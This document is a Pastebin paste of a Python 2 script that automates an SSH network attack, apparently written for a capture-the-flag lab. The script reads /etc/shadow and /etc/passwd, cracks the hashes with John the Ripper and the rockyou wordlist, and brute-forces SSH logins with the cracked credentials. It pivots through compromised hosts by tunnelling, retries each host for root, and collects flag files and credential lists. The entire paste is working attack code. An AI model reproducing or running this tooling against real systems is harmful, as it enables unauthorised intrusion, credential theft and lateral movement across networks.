API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 29th, 2019
147
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.96 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python2
  2. import paramiko
  3. import sys
  4. import os
  5. import subprocess
  6. import re
  7.  
  8. current_user = sys.argv[1]
  9. current_pass = sys.argv[2]
  10. creds = {"SELF":[(current_user,current_pass)]}
  11. #users = ["root","student"]
  12. #passwords = ["student","student123"]
  13. users = [current_user]
  14. passwords = [current_pass]
  15. credmatcher = re.compile('^(\S+)\s+\((\S+)\)$')
  16. flag_org = {}
  17. visited = []
  18.  
  19. count_shadow = 0
  20. count_ssh_key = 0
  21.  
  22. ip_tmp = []
  23. ip = [] #tuples: (ip_addr, where it's from)
  24. revisit = []
  25. conn = {} #key:host, value:(tunnel,connection)
  26.  
  27. # client is the ssh client, dest is ip
  28. def tunnel_from_client(dest,user,pw,client=None):
  29. paramiko.util.log_to_file("log.txt")
  30. dest_info = dest.split(":")
  31. dest_ip = dest_info[0]
  32. dest_port = int(dest_info[1])
  33. dest_client = paramiko.SSHClient()
  34. dest_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  35. if client:
  36. trans = client.get_transport()
  37. ch = trans.open_channel('direct-tcpip',src_addr=('127.0.0.1',22),dest_addr=(dest_ip,dest_port))
  38. """
  39. if src_port:
  40. ch = trans.open_channel('direct-tcpip',src_addr=('127.0.0.1',src_port),dest_addr=(dest_ip,dest_port))
  41. else:
  42. ch = trans.open_channel('direct-tcpip',src_addr=('127.0.0.1',22),dest_addr=(dest_ip,dest_port))
  43. #ch = trans.open_channel('direct-tcpip',src_addr=('127.0.0.1',22),dest_addr=(dest_ip,dest_port))
  44. """
  45. dest_client.connect(dest_ip,port=dest_port,username=user,password=pw,sock=ch)
  46. else:
  47. trans = None
  48. dest_client.connect(dest_ip,port=dest_port,username=user,password=pw)
  49. return trans,dest_client
  50.  
  51.  
  52. def jack(password,shadow):
  53. changed = False
  54. global users, passwords,count_shadow
  55. count_shadow += 1
  56. try:
  57. p = open("password.txt","w")
  58. u = open("shadow.txt","w")
  59. p.write(str(password))
  60. p.close()
  61. u.write(str(shadow))
  62. u.close()
  63. #subprocess.Popen("umask 077",shell=True)
  64. subprocess.Popen("unshadow password.txt shadow.txt > mypasswd",shell=True)
  65. result = subprocess.Popen("john mypasswd --wordlist=rockyou.txt",stdout=subprocess.PIPE,shell=True)
  66.  
  67. for line in result.stdout.readlines():
  68. creds = credmatcher.match(line)
  69. if creds:
  70. u = creds.group(2)
  71. if u not in users:
  72. users.append(u)
  73. changed = True
  74. p = creds.group(1)
  75. if p not in passwords:
  76. passwords.append(p)
  77. changed = True
  78.  
  79. subprocess.Popen("rm password.txt shadow.txt mypasswd",shell=True)
  80. return changed
  81.  
  82. except Exception as e:
  83. print e
  84.  
  85. exc_type, exc_obj, exc_tb = sys.exc_info()
  86. fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
  87. print(exc_type, fname, exc_tb.tb_lineno)
  88. print "Cannot crack passwords"
  89. return changed
  90.  
  91.  
  92. def crack(ip_addr,come_from):
  93. global conn,creds
  94. for u in users:
  95. for p in passwords:
  96. try:
  97. print "[*] Attempting login to "+ip_addr+" with " + u + "/" + p
  98. if come_from in conn.keys():
  99. _,connection = conn[come_from]
  100. tunnel,client = tunnel_from_client(ip_addr,u,p,connection)
  101. else:
  102. tunnel,client=tunnel_from_client(ip_addr,u,p)
  103. if ip_addr in creds.keys():
  104. creds[ip_addr].append((u,p))
  105. else:
  106. creds[ip_addr] = [(u,p)]
  107. conn[ip_addr] = (tunnel,client)
  108. visited.append(ip_addr)
  109. print "[*] Login to " + ip_addr + " succeeded"
  110. # TODO add to creds list
  111. return u
  112. except Exception as e:
  113. #print e
  114. continue
  115. return False
  116.  
  117.  
  118. # revisit all the computers in revisit to try and crack root
  119. # once root is cracked go to etc password and etc shadow
  120. def rerevisit():
  121. global revisit,creds
  122. tmp2 = []
  123. for ip_addr, from_where in revisit:
  124. for p in passwords:
  125. try:
  126. print "[*] *revisiting for root* Attempting login to "+ip_addr+" with root/" + p
  127. if from_where:
  128. _,connection,src_port = conn[from_where]
  129. tunnel,client = tunnel_from_client(ip_addr,"root",p,connection)
  130. else:
  131. tunnel,client = tunnel_from_client(ip_addr,"root",p)
  132. connection=client
  133.  
  134. conn[ip_addr] = (tunnel,client)
  135. tmp2.append((ip_addr,from_where))
  136. print "[*] Login to " + ip_addr + " succeeded"
  137.  
  138. if ip_addr in creds.keys():
  139. creds[ip_addr].append(("root",p))
  140. else:
  141. creds[ip_addr] = [("root",p)]
  142. # TODO look for flags and server
  143. _,stdout,stderr=connection.exec_command("cat ~/servers.txt")
  144. tmp = stdout.read()
  145. if tmp:
  146. print "[*] Found servers file on " + ip_addr
  147. for i in tmp.strip().split("\n"):
  148. # TODO print statement
  149. if i not in ip_tmp:
  150. ip.append((i,ip_addr))
  151. ip_tmp.append(i)
  152. # every time you update this list, go thru revisit once
  153. print "[+] Adding " + str(tmp.strip().split("\n")) + " to global target queue"
  154. else:
  155. print "[*] Servers file not found on " + ip_addr
  156.  
  157. _,stdout,stderr=connection.exec_command("cat /flag.txt")
  158. tmp = stdout.read()
  159. if tmp:
  160. if ip_addr not in flag_org.keys():
  161. print "[!] Flag file found on " + ip_addr + ", contents: \"" + tmp + "\""
  162. flag_org[ip_addr] = tmp
  163. else:
  164. print "[!] Flag file had been found before on " + ip_addr
  165. elif stderr.read():
  166. print "[*] No flag file found on " + ip_addr
  167.  
  168.  
  169.  
  170. _,stdout,stderr=connection.exec_command("cat /etc/shadow")
  171. shadow = stdout.read()
  172. _,stdout,stderr=connection.exec_command("cat /etc/passwd")
  173. passwd = stdout.read()
  174. # TODO add to etc shadow count
  175. jack(passwd,shadow)
  176. # rerevisit()
  177. except Exception as e:
  178. continue
  179. print "ERRORRR"
  180. exc_type, exc_obj, exc_tb = sys.exc_info()
  181. fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
  182. print(exc_type, fname, exc_tb.tb_lineno)
  183. print e
  184. continue
  185.  
  186. for i in tmp2:
  187. revisit.remove(i)
  188.  
  189.  
  190.  
  191.  
  192. ip_list = subprocess.Popen("cat ~/servers.txt",stdout=subprocess.PIPE,shell=True)
  193. print "[*] Read targets file"
  194. for i in ip_list.stdout.read().strip().split("\n"):
  195. ip.append((i,None))
  196. # TODO crack password file for initial server, append to users and passwords
  197. shadow = subprocess.Popen("cat /etc/shadow",stdout=subprocess.PIPE,shell=True)
  198. passwd = subprocess.Popen("cat /etc/passwd",stdout=subprocess.PIPE,shell=True)
  199. jack(passwd.stdout.read(),shadow.stdout.read())
  200.  
  201. while(ip):
  202. #print "current IP list: " + str(ip)
  203. #print "need to revisit: " + str(revisit)
  204. current,come_from = ip.pop(0)
  205. u = crack(current,come_from)
  206. if not ((set(ip)|set(revisit))-set(visited)):
  207. break
  208. try:
  209. if u:
  210. if u != "root":
  211. revisit.append((current,come_from))
  212.  
  213. _,connection = conn[current]
  214. _,stdout,stderr=connection.exec_command("cat ~/servers.txt")
  215. tmp = stdout.read()
  216. if tmp:
  217. print "[*] Found servers file on " + current
  218. for i in tmp.strip().split("\n"):
  219. # TODO print statement
  220. if i not in ip_tmp:
  221. ip.append((i,current))
  222. ip_tmp.append(i)
  223. # every time you update this list, go thru revisit once
  224. print "[+] Adding " + str(tmp.strip().split("\n")) + " to global target queue"
  225. else:
  226. print "[*] Servers file not found on " + current
  227.  
  228. _,stdout,stderr=connection.exec_command("cat /flag.txt")
  229. f = stdout.read()
  230. if f:
  231. if current not in flag_org.keys():
  232. print "[!] Flag file found on " + current + ", contents: \"" + f + "\""
  233. flag_org[current] = f
  234. else:
  235. print "[!] Flag file had been found before on " + current
  236.  
  237. elif stderr.read():
  238. print "[*] No flag file found on " + current
  239.  
  240. _,stdout,stderr=connection.exec_command("cat /etc/shadow")
  241. tmp = stdout.read()
  242. if tmp:
  243. _,stdout,stderr=connection.exec_command("cat /etc/passwd")
  244. print "[*] Dumping /etc/shadow"
  245. jack(stdout.read(),tmp)
  246. rerevisit()
  247.  
  248. elif stderr.read():
  249. print "[*] User "+u+" on "+current+" cannot access /etc/shadow"
  250.  
  251. else:
  252. print "[*] " + current + " back in line"
  253. ip.append((current,come_from))
  254. except Exception as e:
  255. exc_type, exc_obj, exc_tb = sys.exc_info()
  256. fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
  257. print e
  258. print exc_tb.tb_lineno
  259. continue
  260.  
  261.  
  262. print "\n\n=========="
  263. print "Collected " + str(count_shadow) + " /etc/shadow files"
  264. print "Cracked " + str(len(passwords)) + " Passwords"
  265. print "Found " + str(len(flag_org.keys())) + " flag files"
  266. print "Accessed following ips: " + str(creds)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!